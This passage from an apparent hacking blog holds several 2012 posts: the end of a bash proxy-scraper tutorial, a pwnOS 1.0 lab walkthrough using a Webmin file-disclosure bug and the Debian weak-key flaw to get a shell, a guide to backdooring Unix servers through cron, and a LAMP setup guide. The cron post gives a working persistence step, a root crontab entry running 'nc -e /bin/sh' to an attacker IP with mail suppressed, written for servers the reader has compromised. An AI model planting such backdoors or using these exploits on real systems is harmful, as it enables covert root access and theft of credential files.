pieces we simply print them and redirect them to a file for safe keeping...<br /><br />Once we add in the loop our script starts to take some shape and now appears similar to the below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/M4ASU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="http://i.imgur.com/M4ASU.png" width="400" /></a></div>
<br />
This should now successfully scrape the first page from HideMyAss free proxy lists and return a clean listing of the IP and Port for each one and store it in a file for safe keeping (p.txt).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/1zK5I.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/1zK5I.png" width="327" /></a></div>
<br />
You could stop now if you wanted but we will spend a few more minutes on things and clean it up and make it just a little bit better...<br /><br />We will add a few more lines to clean the results. We can use 'sort' and 'uniq' command to put them in order, helping to arrange by IP block (Geo) and also to remove any duplicates which might be in the list. To accomplish this we will just some piping and redirect the final output to a new file which will be our final results file. Since we redirect the full output to the file nothing is presented to the user, so to counter this we will print a exit message which tells them how many are now in the final list. We then will remove our temp files we used for building (o.txt & p.txt) and when the end of file is reached the script will be completed and end on its own. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/GovuC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://i.imgur.com/GovuC.png" width="400" /></a></div>
<br />
If you dont want to use actual files like o.txt or p.txt you can use a more user and system friendly feature via the 'mktemp' command. This will create temporary files which should be removed once done. Simply create a variable at start of script to hold the temp file value and replace all occurrences of o.txt and p.txt with your new variable names ("$STOR" and "$STOR2") and set the below variables at start of script:<br />===========================================================================================================================<br />JUNK=/tmp<br />STOR=$(mktemp -p "$JUNK" -t fooooobarproxyscraper.tmp.XXX)<br />STOR2=$(mktemp -p "$JUNK" -t fooooobarproxyscraper2.tmp.XXX)<br />===========================================================================================================================<br /><b>NOTE:</b> it must end in .XXX so that it can create some random aspects of file name and is required syntax, -p above is specifying the temp folder location<br /><br />We can also increase our grab area by leveraging Curl's ability to perform some mild expansion like bash. We can make a minor tweak to our initial Curl command to instead of grabbing just a single page we can instead grab multiple pages. HMA has 35 pages available but for all intensive purposes only the first 5 are typically usable and fresh so lets tweak it so we grab the first 5 pages instead of just the 1. <br /><br />We change this:<br /><b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/1<br /><br />to this:<br /><b>COMMAND: </b>curl http://www.hidemyass.com/proxy-list/<b>[1-5]</b><br /><br />With this minor change Curl will know to replace the initial request for each page, from 1 through 5! Alter to grab all 35 pages if you like!<br /><br />Piece it all together and you now have a quick and easy script capable of scraping a decent number of usable proxies from HideMyAss. For the super lazy the writeup script Source can be found here: <a href="http://pastebin.com/Q4cbNr2q">http://pastebin.com/Q4cbNr2q</a><br /><br />You can take this logic and apply towards other sites, which in most cases will probably be easier although some may be more tricky (handling redirects, js decoding, more logic challenges to pull data, etc). Perhaps you can mod this a step further to build in a proxy tester of some kind? Hopefully you can now build your own and be on your way to making this and even cooler scripts with a little bash magic!<br /><b><br />Until next time, enjoy!</b><br /><br />
<br />
PS - I wasn’t really prepared to provide a full bash tutorial or any real in depth explanation of things so for that I am sorry. The real goal was to share the technique and methods I used so those who want will be able to follow suit and be on there way to scraping the net with simple bash scripts. Patience and hard work go a long way!<br />
<br />
Here are some helpful links and references for anyone interested in learning more about Bash or any tools used in this example:<br /><b>Bash Scripting Guide: </b><a href="http://tldp.org/LDP/abs/html/index.html">http://tldp.org/LDP/abs/html/index.html</a><br /><b>Bash Arrays:</b> <a href="http://wiki.bash-hackers.org/syntax/arrays">http://wiki.bash-hackers.org/syntax/arrays</a><br /><b>Bash Conditions:</b> <a href="http://www.linuxtutorialblog.com/post/tutorial-conditions-in-bash-scripting-if-statements">http://www.linuxtutorialblog.com/post/tutorial-conditions-in-bash-scripting-if-statements</a><br /><b>Awk & Sed Examples:</b> <a href="http://www.osnews.com/story/21004/Awk_and_Sed_One-Liners_Explained">http://www.osnews.com/story/21004/Awk_and_Sed_One-Liners_Explained</a><br /><b>Awk Guides:</b> <a href="http://www.pement.org/awk/awk1line.txt">http://www.pement.org/awk/awk1line.txt</a><br /><b>Sed Guides: </b><a href="http://www.tty1.net/sed-intro_en.html,">http://www.tty1.net/sed-intro_en.html,</a> <a href="http://sed.sourceforge.net/sed1line.txt">http://sed.sourceforge.net/sed1line.txt</a><br />
<b>Linux Docs: </b><a href="http://linux.die.net/">http://linux.die.net/</a><br /><b>Helpful Search:</b> <a href="http://www.computerhope.com/">http://www.computerhope.com/</a><br /><br />PSS - If you want to speed things up a bit (for this script and others) you can look into jazzing things up with GNU Parallel tool (<a href="http://www.gnu.org/software/parallel/">http://www.gnu.org/software/parallel/</a>) which is a easy add-in once you know what your doing and helps managing threads and background processes much easier than the usual grabbing of PID and killing method for thread maintenance ;)<br /><br /><b>Video Bonus:</b> Advanced Parallel Version I wrote for myself and close friends: <br />
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://2.gvt0.com/vi/iXCeR_XsP6o/0.jpg"><param name="movie" value="http://www.youtube.com/v/iXCeR_XsP6o&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/iXCeR_XsP6o&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com12tag:blogger.com,1999:blog-8671806905307905831.post-26569730050733047402012-08-03T23:22:00.000-05:002012-08-03T23:24:28.300-05:00Exploiting CVE-2008-0166: Debian Weak Key Generation Vulnerability & Webmin on pwnOS 1.0Today I will walk through my fun with pwnOS 1.0 and focus on exploiting a Local File Disclosure in Webmin and then ultimately gaining shell access through exploitation of CVE-2008-0166: Debian Weak Key Generation Vulnerability. I will do my best to explain things as they occurred as well as the how and why and then you can watch a video at the end if anything remains unclear. We start by first finding it with the typical NMAP scan.<br />
<b><br /></b><br />
<b>COMMAND: </b>nmap -v -sS -A -PN <IP><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/XbRpL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/XbRpL.png" width="398" />I </a></div>
<br />
I initially investigated the web presence to see what was going on there. It seems to just poke some fun at the attacker, however I did find a LFI vuln in the main page but was only able to read a few files with it, nothing major though. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/tIKJY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="http://i.imgur.com/tIKJY.png" width="400" /></a></div>
<br />
Now since I couldn't exploit the LFI vuln in any worthwhile meaning I continued on. I now turned my attention to the HTTP service running on port 10000. This of course turned out to be a running instance of Webmin, this is the default port for it as well. We dont get any real version info except from the banner which indicates it is likely an early release. We do a quick check and find <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392">CVE-2006-3392</a> which when combined with the approach used for the earlier released <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3274">CVE-2006-3274</a> should allow local file disclosure on anything less than version 1.29 (both Usermin and Webmin affected). I reviewed an existing PHP script found in Exploit-DB but since I don't like PHP much I decided to write my own script in bash. You can find the source to my script here: <a href="https://pastee.org/ymv9m">https://pastee.org/ymv9m</a>. You just point it at the target server, indicate the port webmin/usermin service is running on and let it know what file you want to get. Since Webmin typically runs as root or with root privileges we can read pretty much any file on the server. Using my script I was able to snatch the /etc/passwd, /etc/shadow, and a few /home/$user/.ssh/authorized_keys files with this vulnerability.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/OG8lA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/OG8lA.png" width="315" /></a></div>
<br />
<br />
You could stop here and direct all attention to cracking the Unix password (DES) hashes from the shadow file but I decided to investigate further to see if there were any other ways we could get a shell first...<br />
<br />
Nessus to the rescue:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/manDd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="http://i.imgur.com/manDd.png" width="400" /></a></div>
<br />
We find the target server has a critical vulnerability identified, marked as Debian Weak Key Generation Vulnerability (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166">CVE-2008-0166</a>) which indicates a remote shell is possible. I looked it up and found out it was an interesting vulnerability indeed. If you want the full writeup and details you can check out original Debian security writeup here: <a href="http://digitaloffense.net/tools/debian-openssl/">http://digitaloffense.net/tools/debian-openssl/</a>. Essentially there is a flaw in how the random generator works and due to the flaw the randomness is not so random. In fact it uses a base around the current process ID, problem is that PID number possibilities are limited to 32,758 possibles so we have a severely limited key set as a result. HD Moore figured out we could pre-generate these keys and bruteforce a weak generated key to find the matching pair and thus allow connection over SSH or decryption of SSL encrypted data. You can read the article to find out how to generate your own keys as well as a few links to sets available for download. There are several scripts in the exploit databases available in several languages which do the job of finding the right pair but I my favourite after testing several was the Warcat Team's python script as it had the best results without drastic compromise on timing. Essentially they all sort through the possible key files using threaded SSH connection attempts until one pops indicating a match has been found. You may need to alter the script to insert some delays and such if you have a sensitive target or lockout policy in place (could also tweak to rotate after x number of attempts to attack a different user account). You can then turnaround and use this found key to connect or to decrypt depending on if you are attacking SSH or SSL. This approach would be what I would call the ONLINE approach and is not light on the logs of the target server. Alternatively if you already have one key you can use the pre-generated keys in an OFFLINE manner to find the matching key wihtout any need to send anything to the target server. Once you find the match you can again turnaround and connect or decrypt based on your situation.<br />
<br />
Quick run through of abusing this against SSH to pop shell:<br />
Using the keys you made or downloaded (see link referenced above) and the Warcat script (exploit-db) we simply point script to our keys, the target server, the port SSH is running, and give it a valid user-name for SSH account on server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/lwiLG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/lwiLG.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
It will then launch the bruteforce attack until it finds the matching key. You might need a little patience but in most cases it should be able to test the full key set in about 20 minutes or less. Once its found you should get some kind of indicator that the key was found, Warcat script even gives you SSH syntax for connecting after finding:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/wGDgI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="http://i.imgur.com/wGDgI.png" width="400" /></a></div>
<br />
Once known we confirm its working by actualy connecting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Vwg9B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://i.imgur.com/Vwg9B.png" width="400" /></a></div>
<br />
<br />
We finish things off with the sock_sendpage() or sendsock.c exploit which yields us root privileges for the final win against pwnOS 1.0.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Mossi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://i.imgur.com/Mossi.png" width="400" /></a></div>
<br />
<br />
I understand there are other ways this can be done but thought I would share my experience with you guys. In case anyone still having trouble grasping everything or for those who just need the visual walk through, here is a short video on everything: <a href="http://www.youtube.com/watch?v=YudNYxQw240">http://www.youtube.com/watch?v=YudNYxQw240</a><br />
<br />
<b><br /></b><br />
<b>Until next time, Enjoy!</b><br />
<br />
<br />
<br />
<br />HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com0tag:blogger.com,1999:blog-8671806905307905831.post-57844442356480016102012-07-09T23:24:00.001-05:002012-07-09T23:24:27.681-05:00Backdooring Unix System via CronOnce we have access to a compromised system there are a few ways one can go about increasing your foothold on the system for future return access, a.k.a. persistence. This serves as a way back in should the system be updated or patched rendering the original exploited entry path useless (perhaps you patched yourself to keep other hackers out :p). Persistence can be done in a many ways with many methods, but today I will be explaining how we can take advantage of cron to use cron jobs to create one more layer of persistence using a scheduled backdoor. I will outline things for you an as easiest way possible with basic explanation of cron as I understand it and you should be able to tweak things when done to fit your specific need or clever idea for even more evil trickery ;)<br /><br /><b>What is Cron?</b><br />Cron is a Unix utility which executes commands or scripts automatically at a specified time and/or date. It is commonly used by system administrators to run scheduled maintenance tasks, checking emails and logs and such. It is great for handling both simple and complex routines which can be a pain to manage manually (life gets in the way for us all, it just happens and cron is there to help xD). It can be used to run just about anything really....<br /><br />Good Cron Reference I found: <a href="http://en.wikipedia.org/wiki/Cron">Cron Wiki</a><br /><br /><b>How to tell if Cron is already running on your system?</b><br /><br />You can type this at command prompt: <br /><b>COMMAND:</b> ps aux | grep cron<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YeULB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/YeULB.png" width="400" /></a></div>
<br /><br />You should get two lines returned if its running. One for the crond returned by grep and the second line would be your grep command catching itself in the ps output list. If you only get a single line it is probably the self grep and you can now decide if you want to get it running yourself or move on to another method for backdooring this host. Starting crond if not already running might not be the smoothest most ninja move in the book and requires root privileges, but its up to you to make a judgement call. You can edit the start-up scripts and add "crond" to it and it will start the next time the system reboots. If you are impatient like me and want to get things going right away you can simply type "crond" at command prompt with root privileges. <br /><br /><b>How to create cron jobs (using cron)?</b><br />Once crond daemon is running we can now add cron jobs to have them performed on schedule as defined when the job is added. You can review the cron documentation for the full ins and outs for how to go about editing cron or setting up scheduled jobs but we will focus on the crontab command which we can use to view and edit the cron jobs. If you want to first view the existing cron jobs you can simply type:<b> </b><br />
<br />
<b>COMMAND:</b> crontab -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/XmXYx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/XmXYx.png" width="400" /></a></div>
<br />
<br />If you are root you can view/switch/alter any users crontab by using the -u argument followed by username.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>COMMAND: </b>crontab -u dumbadmin -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/N23jB.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/N23jB.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />We use the "-e" argument to enter into edit mode. In this mode we will use built-in nano text editor to edit the cronjobs file. If you try to edit the file in the spool directory it wont save properly and may be lost so use the -e option to ensure it is properly edited and saved as the config actually resides in memory not in file. If you want to remove all entries you can use the "-r" argument which will clear crontab.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/hctEt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/hctEt.png" width="400" /></a></div>
<br />
<br />
When editing you need to be familiar with cron formatting or you will not have any luck getting things to run right or at the right time. You have the ability to define the SHELL variable, PATH, and other variables as you would in a normal bash script. once important one is the MAIL= or MAILTO= variables which establish the email for where job details will be sent once completed. You can set to NULL by using a MAIL="" entry so that nothing is sent anywhere (usefull for persistent options). Once you have defined any needed variables you can then define your command or script to run and when. There are normally<br />seven fields in the crontab job entry which define the: Minute, Hour, DayofMonth, month, DayOfWeek, User CMD<br /><br />
MINUTE=0-59<br />
<ul>
<li>Defines the minute of the hour to run command</li>
</ul>
HOUR=0-23<br />
<ul>
<li>Uses 24Hr count with 0 being midnight</li>
</ul>
DayOfMonth=0-31<br />
<ul>
<li>Defines the day of the month to run command on</li>
</ul>
MONTH=0-12<br />
<ul>
<li>Use numerical representation of months (1=Jan,12=Dec)</li>
</ul>
DayOfWeek=0-7 or Sun-Sat<br />
<ul>
<li>Defines day of the week to run command and can be numerical or name of day</li>
</ul>
USER=<username><br />
<ul>
<li>Defines the user who runs the command, not really required when -u <user-name> is used as runs with defined user privs</li>
</ul>
CMD=<insert-command-to-run><br />
<ul>
<li>Defines the command or script to run. This can contain spaces and multiple words to allow some flexibility in defining what you want run and how </li>
</ul>
<br />You can omit any option by placing an asterisk in place of its value, serves as an all type indicator. <br /><br /><b>What does all this really mean for me (Mr Hacker)?</b><br />It means if you have access to crontab you can create cron jobs which you can use to run your backdoor scripts at predefined intervals. Here is an example to after exploiting a server to add a reverse shell which is spawned every 2 minutes with no mail sent after completed job. <br /><br /><b>COMMAND:</b> crontab -u root -e<br /><br /><b>#ADDS THIS</b><br />MAIL="" # Make sure our entry doesnt get mailed to any default mail values for existing user entries<br />*/30 * * * * nc -e /bin/sh 192.168.1.21 5151 #Spawn reverse shell every 30 minutes to our set IP and PORT :p<br /><br /><b>#SAVES & EXITS</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/h7tfK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/h7tfK.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />Now confirm our changes were saved by listing them again:<br /><br />
<b>COMMAND:</b> crontab -u root -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/MqkZG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/MqkZG.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />You should now see the above added entry in your crontab list now. Open up a local listener and wait for your connection from the compromised server with root privileges.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/9hXjA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://i.imgur.com/9hXjA.png" width="400" /></a></div>
<br />
<br />
Now if you get disconnected or want to do some work just open a listener and wait to catch the next call home. You can play with the timing to do all sorts of stuff, I only used 2min for demo purposes.... <br /><br /><b>A few side notes:</b><br />Administrators will often use builtin system features to restrict cron access, these are typically done using the files /etc/cron.allow and /etc/cron.deny. You can add "ALL" or the specific username to these files if needed (may requires root privileges).<br />
<br />
<b>COMMAND:</b> echo dumbAdmin >> /etc/cron.allow<br /><br />If you need results from your cron run commands, scripts, what have you simply use standard Unix redirection syntax (>, >>, 2>&1, etc) to send the output to the necessary log file how you like. <br /><br />If you can edit crontab and you don't have root access you can still use it to spawn a shell but it will only be served up with the user privileges for that which was edited with or set to run with. <u>You can also abuse editable scripts launched via cron jobs as well and abuse the rights by which they are executed with on occasion when conditions are right this can also result in <b>complete compromising of system, r00t access! </b></u><b><br /><br />Until next time, Enjoy!</b><br /><br /><br />PS - I am new to trying to learn cron so this is my take on a 1 day crash course I just gave myself. If you have suggestions to improve things please let me know so I can update and improve or add other tricks you care to share....HRhttp://www.blogger.com/profile/05957795383670307007noreply@blogger.com4tag:blogger.com,1999:blog-8671806905307905831.post-32551711865575676122012-07-03T11:58:00.000-05:002012-07-03T11:58:15.621-05:00Setting up Linux Apache, MySQL, and PHP (LAMP) Environment<style type="text/css">
<!--
@page { margin: 0.79in }
P { margin-bottom: 0.08in }
A:link { so-language: zxx }
-->
</style>
<br />
<div style="margin-bottom: 0in;">
Today I will walk you through setting
up your own local test environment on Ubuntu but the steps outlined
should be applicable or easily transferred over to other Linux
distributions. We will build it in layers and we will start with
apache2 and work our way up from there with each layer essentially
building on the previous. I will try to keep it as simple as
possible, here goes...</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>APACHE:</b></u></div>
<div style="margin-bottom: 0in;">
In order to install apache we will use
"apt-get". Simply open up a terminal and type the following
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo apt-get install
apache2 </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uP3Mt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/uP3Mt.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
This downloads and installs apache2
with all the needed requirements without all the fuss. We can confirm
it is working by simply pointing our browser at: http://localhost or
http://127.0.0.1:80
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/WHAhV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://i.imgur.com/WHAhV.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You should see the basic Apache starter
page stating its working. You can find this file in "/var/www/"
directory. You can now place files in this folder to be displayed by
your Apache web server. If you need to start|stop|restart the Apache
server simple issue this command:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 start|stop|restart
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>PHP:</b></u></div>
<div style="margin-bottom: 0in;">
Now we have our server up, BUT if you
place a PHP file (<? phpinfo(); ?>) in the "/var/www/" directory you will
quickly see it doesn't work as intended (it probably tries to make
you download the file). We need to now add another layer to our
server to speak PHP, by installing PHP. We can do this with another
"apt-get" set of commands, here are the steps to install
the latest version of PHP5 and the necessary apache modules to
accompany:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND:</b> sudo apt-get install
php5 libapache2-mod-php5
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Ihinb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/Ihinb.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Now you if you go and try your PHP page
you will still find its not working properly. We need to restart the
Apache server for our changes to be properly incoporated. We use the
command provided above to restart Apache...
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo
/etc/init.d/apache2 restart
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/5PafO.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/5PafO.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
and now when we point our browser to:
http://localhost/file.php we are greeted with the proper greeting we
were expecting.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Negrp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="http://i.imgur.com/Negrp.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If you want to find the files for
apache web output just navigate to “/var/www/”</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/TltwW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://i.imgur.com/TltwW.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>NOTE: </b>If for some reason you
dont have a PHP file handy simply make a file with .php extensionn
and place this inside "<? echo "<font
color='red'><b>Hey Fucker it works!</b></font>";
?>" so that it shows nice message when viewed in the browser
:p
</div>
<div style="margin-bottom: 0in;">
</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<u><b>MySQL: </b></u>
</div>
<div style="margin-bottom: 0in;">
Now eventually you will need or want a
database to connect to so I will also include setting up of MySQL
database today as well. We will one more time take advantage of the
simplicity built into "apt-get" and use the following
command to download MySQL Server and all the basics to go with it.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo apt-get install
mysql-server
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/E1Txj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/E1Txj.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You should be prompted about half way
through to enter a password for your new MySQL "root" user.
Make something secure and take note of it for use later on. Once
entered it will continue running through the installation, go have
smoke, grab beer, whatever kills a few minutes for you.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2nUgN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/2nUgN.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Once it finishes we check to confirm it
was properly installed by using the mysql client (installed by
default in most cases and done by the above apt-get if not already).
We connect to the localhost database by using the built-in master
account, user name "root", paired up with the password we
created during the installation.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If for some reason you were not
prompted for a password for the root user during installation then we
can use this command to set one as we don't want MySQL root user with
no password (out of pure habit prevention):
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>mysql -u root
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND-mysql> </b>SET PASSWORD
FOR 'root'@'localhost' = PASSWORD('yourpassword');
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>\q
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
The final syntax looks like this to
connect to the database going forward (once connected you can create
users|databases|tables|etc):
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo mysql -u root
-p'<password>'
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/nEMSw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/nEMSw.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>NOTE: </b>there is no space between
the “-p” and the quote enclosed password, will cause problems if
you add space as it will treat as database name instead</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
If you want to be able to connect to
the MySQL isntance from other machines on your network then you will
need to make a slight alteration to the MySQL configuration file.
Simply use your favorite text editor to edit the "/etc/mysql/my.conf"
file to alter the "bind-address". It is set to 127.0.0.1 by
default and you need to change it to your network IP address if you
want it to listen so that other machines can then connect (i.e change
127.0.0.1 to 192.168.1.20 or whatever your IP is you want to listen
on), save and exit.
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/IIqmM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://i.imgur.com/IIqmM.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
You now need to restart MySQL Service.
This is similar to Apache but since MySQL runs as a Service we use
the Service command, like so:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo service mysql
start|stop|resart
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/PZNBd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/PZNBd.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
</div>
<div style="margin-bottom: 0in;">
<br /></div>
<div style="margin-bottom: 0in;">
</div>
<div style="margin-bottom: 0in;">
You should now have a fully functional
setup to start your testing with. You can now build PHP applications
and pages with full database support. You can now install hacking
test frameworks like DVWA and have fun as you like. when you get
comfy try installing entire CMS installs for full out testing and bug
hunting. This wraps things up for our introduction to building a
basic test environment for web testing. I hope you have enjoyed this
write up as the first of many more to come.
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
Until next time, Enjoy!
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<u><b>ADDED TIP:</b></u></div>
<div style="margin-bottom: 0in;">
<span style="text-decoration: none;"><b>Enable
cURL support for PHP</b></span>
</div>
<div style="margin-bottom: 0in;">
In many cases you will want or need to
use curl to make certain connections and in PHP the libcurl library
allows us to get all the same functionality via PHP. Assuming you
want to install this or enable this after your setup follow these
quick steps:
</div>
<div style="margin-bottom: 0in;">
<br />
</div>
<div style="margin-bottom: 0in;">
<b>COMMAND: </b>sudo apt-get install
curl libcurl3 libcurl3-dev php5-curl
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dKhPr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="http://i.imgur.com/dKhPr.png" width="400" /></a></div>
<div style="margin-bottom: 0in;">
